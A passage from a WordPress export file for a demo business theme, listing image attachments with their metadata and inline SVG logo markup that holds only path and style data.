		<path class="st0" d="M104.4,22.5v-9.3h2.3v3.6h3.8v-3.6h2.3v9.3h-2.3v-3.6h-3.8v3.6H104.4z"></path>
		<path class="st0" d="M123.9,17.8c0,0.7-0.1,1.3-0.4,1.9c-0.3,0.6-0.6,1.1-1.1,1.5c-0.4,0.4-1,0.8-1.6,1c-0.6,0.2-1.3,0.4-2,0.4    c-0.7,0-1.3-0.1-2-0.4c-0.6-0.2-1.1-0.6-1.6-1c-0.4-0.4-0.8-0.9-1-1.5c-0.3-0.6-0.4-1.2-0.4-1.9c0-0.7,0.1-1.3,0.4-1.9    c0.3-0.6,0.6-1.1,1-1.5c0.4-0.4,1-0.8,1.6-1c0.6-0.2,1.3-0.4,2-0.4c0.7,0,1.3,0.1,2,0.4c0.6,0.2,1.1,0.6,1.6,1    c0.4,0.4,0.8,0.9,1.1,1.5C123.8,16.5,123.9,17.2,123.9,17.8z M121.6,17.8c0-0.4-0.1-0.7-0.2-1.1c-0.1-0.3-0.3-0.6-0.6-0.9    s-0.5-0.4-0.8-0.6c-0.3-0.1-0.7-0.2-1-0.2c-0.4,0-0.7,0.1-1,0.2c-0.3,0.1-0.6,0.3-0.8,0.6c-0.2,0.2-0.4,0.5-0.6,0.9    c-0.1,0.3-0.2,0.7-0.2,1.1c0,0.4,0.1,0.7,0.2,1.1c0.1,0.3,0.3,0.6,0.6,0.9c0.2,0.2,0.5,0.4,0.8,0.6c0.3,0.1,0.7,0.2,1,0.2    c0.4,0,0.7-0.1,1-0.2c0.3-0.1,0.6-0.3,0.8-0.6c0.2-0.2,0.4-0.5,0.6-0.9C121.5,18.6,121.6,18.2,121.6,17.8z"></path>
		<path class="st0" d="M124.4,21.1l1.3-1.7c0.6,0.5,1.1,0.8,1.6,1c0.5,0.2,1,0.3,1.5,0.3c0.5,0,0.9-0.1,1.2-0.2    c0.3-0.2,0.4-0.4,0.4-0.7c0-0.3-0.1-0.5-0.3-0.6c-0.2-0.1-0.5-0.3-1-0.3l-2-0.4c-0.8-0.1-1.3-0.4-1.7-0.9c-0.4-0.4-0.6-1-0.6-1.7    c0-0.9,0.3-1.6,1-2.1c0.7-0.5,1.6-0.8,2.8-0.8c0.7,0,1.4,0.1,2.1,0.4c0.7,0.2,1.3,0.6,1.8,1l-1.2,1.7c-0.5-0.4-1-0.7-1.4-0.8    c-0.5-0.2-0.9-0.3-1.4-0.3c-0.5,0-0.8,0.1-1.1,0.2c-0.3,0.1-0.4,0.3-0.4,0.6c0,0.2,0.1,0.4,0.3,0.5c0.2,0.1,0.5,0.2,0.8,0.3    l1.9,0.3c0.9,0.1,1.6,0.4,2,0.9c0.5,0.5,0.7,1,0.7,1.8c0,0.9-0.4,1.7-1.1,2.2c-0.7,0.5-1.7,0.8-3,0.8c-0.7,0-1.5-0.1-2.2-0.4    C125.6,21.9,125,21.6,124.4,21.1z"></path>
		<path class="st0" d="M132.9,15.2v-2h8.4v2h-3v7.3H136v-7.3H132.9z"></path>
	</g>
	<path class="st0" d="M25.3,19.9c2.1,0,3.9-1.7,3.9-3.9s-1.7-3.9-3.9-3.9s-3.9,1.7-3.9,3.9S23.2,19.9,25.3,19.9z M13.9,23.1   c-1.4,0-2.5,1.1-2.5,2.5c0,1.4,1.1,2.5,2.5,2.5c1.4,0,2.5-1.1,2.5-2.5C16.5,24.2,15.3,23.1,13.9,23.1z M33.5,25.3   c-1,0-1.8,0.8-1.8,1.8s0.8,1.8,1.8,1.8c1,0,1.8-0.8,1.8-1.8S34.5,25.3,33.5,25.3z M43.8,16.3c-0.2-2.9-2.6-5.3-5.5-5.5   c-2.7-0.2-5,1.4-6,3.6l0,0c0,0,0,0,0,0l-1.7,4.1c-0.8,2-2.5,3.5-4.5,4.2h0c-1.4,0.5-3,0.1-4.1-0.9c-0.4-0.4-0.8-0.8-0.8-0.8   c-0.9-0.8-1.5-1.9-1.7-3.1c-0.1-0.4-0.1-0.8-0.1-1.2l0.2-4.5l0.1-2.1l0,0c0-0.1,0-0.1,0-0.2c0-5.7-4.8-10.2-10.5-9.8   C4.3,0.4,0.4,4.3,0,9.1C0,10,0,10.8,0.2,11.6c0.8,4.6,4.8,8,9.7,8c0.2,0,4.3,0.3,5.9,1.2l1.1,0.6c1.1,0.6,1.9,1.6,2.4,2.7l1.4,3.4   l0,0c0.4,1.4,1.6,2.5,3.2,2.5c1,0,2-0.5,2.6-1.2c0.5-0.6,4.1-4.2,4.1-4.2c0.8-0.9,2-1.4,3.2-1.5l4.8-0.3c2.5-0.2,4.5-1.9,5.3-4.2   c0.2-0.6,0.3-1.2,0.3-1.8C43.8,16.6,43.8,16.4,43.8,16.3z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>04</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/04-2/</link>
		<pubDate>Tue, 29 Dec 2020 07:44:34 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/04.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2011</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:44:34]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:44:34]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[04-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/04.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/04.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 88.4 30.4" style="enable-background:new 0 0 88.4 30.4;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x34_">
	<path class="st0" d="M21.9,6c1.2,1,2.8,1.5,4.6,1.4c0.6,0,1.2-0.1,1.9-0.2c-1.2-1.9-2.8-3.6-4.8-4.9c-1.9-1.2-3.9-1.9-5.9-2.2   l1.8,2.8C20.1,4,20.9,5.2,21.9,6z M5.5,18.4C6.2,17.2,6.9,16,7,14.7c0.1-1-0.3-2.1-0.7-3.2L6,10.4C5.4,8.9,4.7,7.4,4.1,6   C4,5.8,3.9,5.7,3.9,5.6c0-0.1-0.1-0.1-0.1-0.2c0-0.1-0.1-0.2-0.1-0.2C3.2,5.7,2.8,6.2,2.4,6.8c-3.7,5.8-3,13,1.1,18   c-0.1-1.3,0.1-2.6,0.6-3.8C4.5,20.1,5,19.3,5.5,18.4z M30.1,18.9c0,0-0.1,0-0.1,0c-0.2,0-0.4,0-0.6,0c-0.1,0-0.2,0-0.2,0   c-1.4,0.2-2.6,0.5-3.7,1.1c-1.4,0.9-2.2,2.5-2.1,4.1c0,0.5,0.1,0.9,0.2,1.4c0.1,0.7,0.3,1.4,0.3,2.1c1.7-1.1,3.1-2.6,4.3-4.4   C29,21.9,29.7,20.4,30.1,18.9z M29.3,16.6c0.4-0.1,0.8-0.2,1.2-0.2c0.1-1.5,0-3-0.3-4.5c-0.2,0-0.4,0.1-0.5,0.1   c-0.9,0.2-1.8,0.5-2.7,0.9c-0.5,0.2-1,0.4-1.4,0.5c-1.3,0.4-3.2,0.9-5.1,0.5c-0.7-0.2-1.3-0.4-1.9-0.8c-1.1-0.7-2-1.8-2.5-3   c-0.4-1.1-0.5-2.2-0.6-3.3c0-0.6-0.1-1.1-0.2-1.6c-0.1-0.9-0.4-1.8-0.9-2.7c-0.5-1-1-1.7-1.5-2.3C10.9,0.3,9,1,7.3,2   C7.2,2.4,7,2.7,7,3C6.7,4.8,8,6.6,9,7.8C9.1,8,9.2,8.2,9.4,8.3c1.3,1.5,2.7,3.3,3,5.5c0.3,2.3-0.6,4.3-1.4,6.2   c-0.7,1.5-1.3,2.9-1.3,4.4c0,1.7,0.9,3.5,2.5,5c0.3,0.3,0.7,0.6,1.1,0.9c0.9,0.1,1.8,0.2,2.7,0.1c0.4-0.3,0.8-0.5,1.1-0.9   c0.8-1,1-2.4,1.1-3.8c0-0.2,0-0.4,0-0.6c0.1-1.5,0.1-3,0.8-4.5c0.8-1.7,2.3-3.1,4-3.6c1.3-0.4,2.7-0.4,4.1-0.4l0.1,0   c0.7,0,1.4,0.1,2,0C29.2,16.6,29.3,16.6,29.3,16.6z"></path>
	<g>
		<path class="st0" d="M48.2,15.5v4.9h-2.4v-4.9l-3.8-7.8h2.5l2.4,5.5l2.4-5.5H52L48.2,15.5z"></path>
		<path class="st0" d="M53.5,20.1c-0.6-0.3-1-0.8-1.3-1.4c-0.3-0.6-0.5-1.3-0.5-2.1v-1.5c0-0.8,0.2-1.5,0.5-2.1    c0.3-0.6,0.8-1,1.3-1.3c0.6-0.3,1.3-0.5,2.1-0.5s1.5,0.2,2.1,0.5c0.6,0.3,1,0.8,1.3,1.3c0.3,0.6,0.5,1.3,0.5,2.1v1.5    c0,0.8-0.2,1.5-0.5,2.1c-0.3,0.6-0.8,1-1.3,1.3c-0.6,0.3-1.3,0.5-2.1,0.5S54.1,20.4,53.5,20.1z M56.8,17.8    c0.3-0.3,0.4-0.7,0.4-1.2v-1.5c0-0.5-0.1-0.9-0.4-1.2s-0.6-0.4-1.1-0.4c-0.5,0-0.9,0.1-1.1,0.4c-0.3,0.3-0.4,0.7-0.4,1.2v1.5    c0,0.5,0.1,0.9,0.4,1.2c0.3,0.3,0.6,0.4,1.1,0.4S56.5,18.1,56.8,17.8z"></path>
		<path class="st0" d="M63,20.1c-0.5-0.3-0.8-0.8-1-1.3c-0.2-0.6-0.4-1.3-0.4-2.1v-1.5c0-0.8,0.1-1.6,0.4-2.2s0.6-1.1,1-1.4    s1-0.5,1.7-0.5c0.5,0,0.9,0.1,1.3,0.4c0.4,0.3,0.7,0.7,1,1.2l-0.2,2c0-0.3-0.1-0.6-0.2-0.8s-0.3-0.4-0.5-0.5    c-0.2-0.1-0.4-0.2-0.7-0.2c-0.5,0-0.8,0.2-1.1,0.5c-0.2,0.3-0.4,0.7-0.4,1.3v1.5c0,0.5,0.1,1,0.4,1.3s0.6,0.4,1.1,0.4    c0.3,0,0.5-0.1,0.7-0.2c0.2-0.1,0.4-0.3,0.5-0.5s0.2-0.5,0.2-0.8l0.1,2.1c-0.2,0.5-0.5,0.9-0.9,1.2c-0.4,0.3-0.8,0.4-1.4,0.4    C64,20.6,63.4,20.4,63,20.1z M66.7,7.7h2.4v12.8h-2.4V7.7z"></path>
		<path class="st0" d="M72.7,20.1c-0.5-0.3-0.8-0.8-1-1.3c-0.2-0.6-0.4-1.3-0.4-2.1v-1.5c0-0.8,0.1-1.6,0.4-2.2s0.6-1.1,1-1.4    s1-0.5,1.7-0.5c0.5,0,0.9,0.1,1.3,0.4c0.4,0.3,0.7,0.7,1,1.2l-0.2,2c0-0.3-0.1-0.6-0.2-0.8s-0.3-0.4-0.5-0.5    c-0.2-0.1-0.4-0.2-0.7-0.2c-0.5,0-0.8,0.2-1.1,0.5c-0.2,0.3-0.4,0.7-0.4,1.3v1.5c0,0.5,0.1,1,0.4,1.3s0.6,0.4,1.1,0.4    c0.3,0,0.5-0.1,0.7-0.2c0.2-0.1,0.4-0.3,0.5-0.5s0.2-0.5,0.2-0.8l0.1,2.1c-0.2,0.5-0.5,0.9-0.9,1.2c-0.4,0.3-0.8,0.4-1.4,0.4    C73.7,20.6,73.1,20.4,72.7,20.1z M73.7,24.2c0,0-0.3-0.1-0.9-0.4c-0.6-0.3-1-0.6-1.3-1.1l1.6-1.5c0.2,0.2,0.5,0.4,0.7,0.5    c0.3,0.1,0.6,0.2,0.9,0.2c0.5,0,0.9-0.1,1.2-0.4c0.3-0.3,0.5-0.7,0.5-1.1v-9h2.4v8.9c0,0.8-0.2,1.6-0.5,2.2    c-0.3,0.6-0.8,1.1-1.4,1.4s-1.4,0.5-2.2,0.5C74,24.2,73.7,24.2,73.7,24.2z"></path>
		<path class="st0" d="M80,11.3h2.3l3.1,7.9l-1.5,1.9L80,11.3z M88.4,11.3l-4.1,11.3c-0.2,0.4-0.3,0.7-0.6,1    c-0.2,0.2-0.5,0.4-0.8,0.5c-0.3,0.1-0.7,0.2-1.2,0.2h-0.5v-2.3h0.5c0.3,0,0.5-0.1,0.6-0.2c0.2-0.1,0.3-0.3,0.4-0.6l3.4-9.9H88.4z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>05</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/05-2/</link>
		<pubDate>Tue, 29 Dec 2020 07:44:35 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/05.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2012</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:44:35]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:44:35]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[05-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/05.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/05.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 143.2 31.3" style="enable-background:new 0 0 143.2 31.3;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x35_">
	<g>
		<path class="st0" d="M57.2,20.5h-3.1l-0.9-2.8h-4.5l-0.9,2.8h-3.1l4.6-12.6h3.4L57.2,20.5z M52.6,15.6l-1.4-4.2    C51.1,11,51,10.6,51,10.2h-0.1c0,0.4-0.1,0.7-0.2,1.1l-1.4,4.3H52.6z"></path>
		<path class="st0" d="M63.9,20.4c-0.4,0.2-1,0.3-1.9,0.3c-2,0-2.9-1-2.9-3v-4.1h-1.5v-2h1.5V9.6l2.8-0.8v2.7h2v2h-2v3.6    c0,0.9,0.4,1.4,1.1,1.4c0.3,0,0.6-0.1,0.9-0.3V20.4z"></path>
		<path class="st0" d="M69.8,20.8c-1.5,0-2.7-0.4-3.5-1.3s-1.3-2-1.3-3.4c0-1.5,0.4-2.7,1.3-3.5c0.9-0.8,2.1-1.3,3.6-1.3    c1.5,0,2.7,0.4,3.5,1.3c0.8,0.8,1.3,2,1.3,3.3c0,1.5-0.4,2.7-1.3,3.5S71.3,20.8,69.8,20.8z M69.9,13.5c-0.7,0-1.2,0.2-1.5,0.7    s-0.5,1.1-0.5,1.9c0,1.7,0.7,2.6,2.1,2.6c1.3,0,2-0.9,2-2.7C71.9,14.3,71.2,13.5,69.9,13.5z"></path>
		<path class="st0" d="M90.8,20.5H88v-5.1c0-1.3-0.5-2-1.4-2c-0.5,0-0.8,0.2-1.1,0.6S85,14.9,85,15.5v5h-2.8v-5.2    c0-1.3-0.5-1.9-1.4-1.9c-0.5,0-0.9,0.2-1.1,0.6c-0.3,0.4-0.4,0.9-0.4,1.5v5h-2.8v-9h2.8V13h0c0.3-0.5,0.7-0.9,1.2-1.2    c0.5-0.3,1.1-0.5,1.7-0.5c1.3,0,2.1,0.6,2.6,1.7c0.7-1.1,1.7-1.7,3-1.7c2,0,2.9,1.2,2.9,3.6V20.5z"></path>
		<path class="st0" d="M94.4,10.1c-0.5,0-0.9-0.1-1.2-0.4c-0.3-0.3-0.4-0.6-0.4-1c0-0.4,0.1-0.8,0.4-1s0.7-0.4,1.2-0.4    c0.5,0,0.9,0.1,1.2,0.4s0.4,0.6,0.4,1c0,0.4-0.1,0.8-0.4,1S94.9,10.1,94.4,10.1z M95.8,20.5H93v-9h2.8V20.5z"></path>
		<path class="st0" d="M104.9,20.2c-0.6,0.4-1.5,0.5-2.7,0.5c-1.4,0-2.5-0.4-3.4-1.3s-1.3-1.9-1.3-3.2c0-1.5,0.5-2.7,1.4-3.6    s2.1-1.3,3.7-1.3c1.1,0,1.8,0.1,2.3,0.4v2.4c-0.6-0.4-1.2-0.7-1.9-0.7c-0.8,0-1.4,0.2-1.9,0.7c-0.5,0.5-0.7,1.1-0.7,1.9    c0,0.8,0.2,1.4,0.7,1.9s1.1,0.7,1.8,0.7c0.7,0,1.4-0.2,2-0.7V20.2z"></path>
		<path class="st0" d="M111.4,20.1v-2.8c0.5,0.4,1.1,0.7,1.7,1c0.6,0.2,1.2,0.3,1.8,0.3c0.4,0,0.7,0,0.9-0.1    c0.3-0.1,0.5-0.2,0.7-0.3c0.2-0.1,0.3-0.2,0.4-0.4s0.1-0.3,0.1-0.5c0-0.2-0.1-0.5-0.2-0.7s-0.3-0.4-0.6-0.5s-0.5-0.3-0.9-0.5    s-0.7-0.3-1.1-0.5c-1-0.4-1.7-0.9-2.2-1.5c-0.5-0.6-0.7-1.3-0.7-2.1c0-0.7,0.1-1.2,0.4-1.7s0.6-0.9,1.1-1.2c0.5-0.3,1-0.5,1.6-0.7    c0.6-0.1,1.2-0.2,1.9-0.2c0.7,0,1.2,0,1.7,0.1c0.5,0.1,1,0.2,1.4,0.4v2.6c-0.2-0.1-0.4-0.3-0.7-0.4s-0.5-0.2-0.8-0.3    c-0.3-0.1-0.5-0.1-0.8-0.2c-0.3,0-0.5-0.1-0.7-0.1c-0.3,0-0.6,0-0.9,0.1c-0.3,0.1-0.5,0.1-0.7,0.3s-0.3,0.2-0.4,0.4    s-0.1,0.3-0.1,0.5c0,0.2,0.1,0.4,0.2,0.6c0.1,0.2,0.3,0.3,0.5,0.5c0.2,0.1,0.5,0.3,0.7,0.4s0.6,0.3,1,0.4c0.5,0.2,1,0.4,1.4,0.7    c0.4,0.2,0.7,0.5,1,0.8s0.5,0.6,0.7,1c0.2,0.4,0.2,0.8,0.2,1.3c0,0.7-0.1,1.3-0.4,1.8c-0.3,0.5-0.6,0.9-1.1,1.2    c-0.5,0.3-1,0.5-1.6,0.6c-0.6,0.1-1.2,0.2-1.9,0.2c-0.7,0-1.3-0.1-2-0.2C112.4,20.5,111.9,20.3,111.4,20.1z"></path>
		<path class="st0" d="M129.6,20.5h-7.6V7.9h7.3v2.3h-4.4v2.8h4.1v2.3h-4.1v2.9h4.7V20.5z"></path>
		<path class="st0" d="M137,20.8c-1.8,0-3.3-0.6-4.4-1.8c-1.1-1.2-1.7-2.7-1.7-4.6c0-2,0.6-3.6,1.7-4.8s2.7-1.8,4.6-1.8    c1.8,0,3.3,0.6,4.4,1.8c1.1,1.2,1.7,2.7,1.7,4.7c0,2-0.6,3.6-1.7,4.8C140.3,20.2,138.8,20.8,137,20.8z M137.1,10.2    c-1,0-1.8,0.4-2.4,1.1c-0.6,0.7-0.9,1.7-0.9,3c0,1.2,0.3,2.2,0.9,3s1.4,1.1,2.3,1.1c1,0,1.8-0.4,2.3-1.1s0.9-1.7,0.9-2.9    c0-1.3-0.3-2.3-0.8-3S138.1,10.2,137.1,10.2z"></path>
	</g>
	<path class="st0" d="M30.3,16.2c-1.3,0-2.4,1.1-2.4,2.4c0,0.3,0.1,0.7,0.2,1l-5.4,5.4c-0.2-0.1-0.4-0.3-0.6-0.4V9.8   c2.6-0.1,4.6-2.3,4.6-4.9c0-2.7-2.2-4.9-4.9-4.9s-4.9,2.2-4.9,4.9c0,0.7,0.1,1.3,0.4,1.9l-6.8,5.3c-1.1-1.1-2.6-1.7-4.3-1.7   c-3.4,0-6.2,2.8-6.2,6.2c0,3.4,2.8,6.2,6.2,6.2c3.4,0,6.2-2.8,6.2-6.2c0-1.1-0.3-2.1-0.8-3l6.7-5.2c0.5,0.6,1.2,1,2,1.2v14.7   c-1.9,0.1-3.3,1.7-3.3,3.5c0,2,1.6,3.6,3.6,3.6c2,0,3.6-1.6,3.6-3.6c0-0.5-0.1-0.9-0.3-1.3l5.6-5.6c0.3,0.1,0.6,0.2,1,0.2   c1.3,0,2.4-1.1,2.4-2.4C32.7,17.2,31.6,16.2,30.3,16.2z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>06</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/06-2/</link>
		<pubDate>Tue, 29 Dec 2020 07:44:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/06.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2013</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:44:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:44:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[06-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/06.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/06.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 128 29.8" style="enable-background:new 0 0 128 29.8;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x36_">
	<path class="st0" d="M12.4,9.9C10.7,8,8.2,7.2,5.8,7.5C5.6,7.9,5.4,8.3,5.2,8.7c1.3,0.3,2.6,0.9,3.6,2c2.5,2.7,2.3,6.9-0.4,9.4   c-0.9,0.9-2.1,1.4-3.2,1.6c0.1,0.2,0.2,0.4,0.3,0.5c2.3,0.5,4.7-0.1,6.5-1.8C15,17.6,15.2,12.9,12.4,9.9z M7.6,17.8   c1.4-1.9,1-4.7-1-6.1c-1.9-1.4-4.7-1-6.1,1C0.3,13,0.1,13.3,0,13.7c0.8-0.8,2-0.9,2.9-0.2c1,0.7,1.2,2.2,0.5,3.2   c-0.7,1-2.2,1.2-3.2,0.5c0,0-0.1,0-0.1-0.1c0.3,0.6,0.8,1.2,1.4,1.6C3.5,20.2,6.2,19.7,7.6,17.8z M20.7,7c-3.1-3.4-7.8-4.5-12-3.3   C8.6,3.8,8.6,3.9,8.5,3.9C7.9,4.5,7.3,5.1,6.9,5.7c2.7-0.2,5.5,0.7,7.5,2.9c3.4,3.7,3.1,9.4-0.6,12.8c-2,1.9-4.7,2.6-7.2,2.3   c0.3,0.4,0.6,0.8,1,1.2c0.3,0.4,0.7,0.7,1,1c3.8,1.2,8.2,0.4,11.4-2.5C24.7,19.1,25.1,11.8,20.7,7z M11.6,1.7   c4.1-0.5,8.5,0.9,11.5,4.2c5,5.4,4.6,13.8-0.8,18.8c-3,2.7-6.8,3.8-10.6,3.4c5.4,2.8,12.2,2.1,16.9-2.2c6.1-5.6,6.5-15,0.9-21.1   C24.9-0.3,17.5-1.4,11.6,1.7z"></path>
	<g>
		<path class="st0" d="M46.9,7.2h5.6c1.2,0,2.1,0.3,2.9,0.9c0.7,0.6,1.1,1.4,1.1,2.4c0,0.6-0.2,1.2-0.5,1.7    c-0.4,0.5-0.9,0.9-1.5,1.1c0.7,0.2,1.3,0.6,1.8,1.1c0.4,0.5,0.7,1.1,0.7,1.9c0,1-0.4,1.9-1.2,2.5c-0.8,0.6-1.8,1-3,1h-5.9V7.2z     M52.3,9h-3.2v3.5h3.2c0.6,0,1.1-0.2,1.5-0.5c0.4-0.3,0.6-0.7,0.6-1.3s-0.2-1-0.6-1.3C53.4,9.1,52.9,9,52.3,9z M52.5,18    c0.7,0,1.2-0.2,1.6-0.5c0.4-0.4,0.6-0.8,0.6-1.4s-0.2-1.1-0.6-1.4c-0.4-0.3-0.9-0.5-1.6-0.5h-3.4V18H52.5z"></path>
		<path class="st0" d="M58.8,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1C64.6,19.9,64,20,63.3,20s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C58.9,16.6,58.8,16,58.8,15.3z M63.3,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1C62,18,62.6,18.2,63.3,18.2z"></path>
		<path class="st0" d="M69.6,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1c-0.6,0.2-1.2,0.4-1.8,0.4s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C69.7,16.6,69.6,16,69.6,15.3z M74.2,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1C72.8,18,73.4,18.2,74.2,18.2z"></path>
		<path class="st0" d="M80,18.8l1-1.4c0.6,0.4,1.1,0.6,1.5,0.8c0.4,0.2,0.9,0.2,1.3,0.2c0.5,0,1-0.1,1.3-0.3s0.5-0.5,0.5-0.9    c0-0.3-0.1-0.5-0.3-0.7s-0.5-0.3-0.9-0.4l-1.6-0.3c-0.9-0.2-1.5-0.4-2-0.9c-0.4-0.4-0.7-1-0.7-1.6c0-0.8,0.3-1.5,1-2    c0.6-0.5,1.5-0.8,2.5-0.8c0.6,0,1.2,0.1,1.8,0.3c0.6,0.2,1.2,0.4,1.7,0.8l-1,1.3c-0.5-0.3-0.9-0.5-1.4-0.7    c-0.4-0.1-0.9-0.2-1.3-0.2c-0.5,0-0.8,0.1-1.1,0.3c-0.3,0.2-0.4,0.4-0.4,0.8c0,0.3,0.1,0.5,0.3,0.6c0.2,0.1,0.5,0.3,1,0.3l1.6,0.3    c0.9,0.2,1.6,0.5,2,0.9c0.4,0.4,0.7,1,0.7,1.6c0,0.4-0.1,0.8-0.3,1.2c-0.2,0.4-0.4,0.7-0.8,0.9s-0.7,0.5-1.2,0.6    c-0.5,0.1-0.9,0.2-1.4,0.2c-0.8,0-1.5-0.1-2.2-0.3S80.5,19.2,80,18.8z"></path>
